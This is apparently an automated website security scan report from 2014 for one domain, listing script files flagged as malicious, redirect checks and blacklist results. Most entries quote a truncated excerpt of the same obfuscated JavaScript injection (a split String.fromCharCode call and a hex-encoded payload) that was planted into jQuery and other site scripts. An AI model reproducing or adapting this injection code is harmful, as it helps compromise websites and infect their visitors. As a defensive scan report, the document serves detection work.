Scanned pages/files
| Request | Server response | Status |
http://xxtribu.com/ | 200 OK Content-Length: 5712 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x68,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3 Antivirus reports:
| ||
http://xxtribu.com/js/jquery-1.7.1.min.js | 200 OK Content-Length: 96820 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x6c,0x72,0x6f,0x76,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x6 Antivirus reports:
| ||
http://xxtribu.com/js/smooth-scroll.js | 404 Not Found Content-Length: 1331 Content-Type: text/html | clean |
http://xxtribu.com/test404page.js | 404 Not Found Content-Length: 1331 Content-Type: text/html | clean |
http://xxtribu.com/js/swfobject.js | 200 OK Content-Length: 13167 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x6c,0x72,0x6f,0x76,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x6 Antivirus reports:
| ||
http://xxtribu.com/js/video_background.js | 200 OK Content-Length: 10627 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x6c,0x72,0x6f,0x76,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x6 Antivirus reports:
| ||
http://xxtribu.com/js/jquery.easing.1.3.js | 200 OK Content-Length: 11048 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x6c,0x72,0x6f,0x76,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x6 Antivirus reports:
| ||
http://xxtribu.com/js/jquery.prettyPhoto.js | 200 OK Content-Length: 27806 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x6c,0x72,0x6f,0x76,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x6 Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xxtribu.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 18:13:52 GMT
Accept-Ranges: bytes
ETag: "662264d-1650-4ed98d27c0e40"
Server: Apache
Vary: Accept-Encoding
Content-Length: 5712
Content-Type: text/html
Last-Modified: Sun, 15 Dec 2013 20:48:49 GMT
...5712 bytes of data.
GET / HTTP/1.1
Host: xxtribu.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 18:13:52 GMT
Accept-Ranges: bytes
ETag: "662264d-1650-4ed98d27c0e40"
Server: Apache
Vary: Accept-Encoding
Content-Length: 5712
Content-Type: text/html
Last-Modified: Sun, 15 Dec 2013 20:48:49 GMT
...5712 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: xxtribu.com
Referer: http://www.google.com/search?q=xxtribu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xxtribu.com
Referer: http://www.google.com/search?q=xxtribu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xxtribu.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xxtribu.com/
Result: xxtribu.com is not infected or malware details are not published yet.
Result: xxtribu.com is not infected or malware details are not published yet.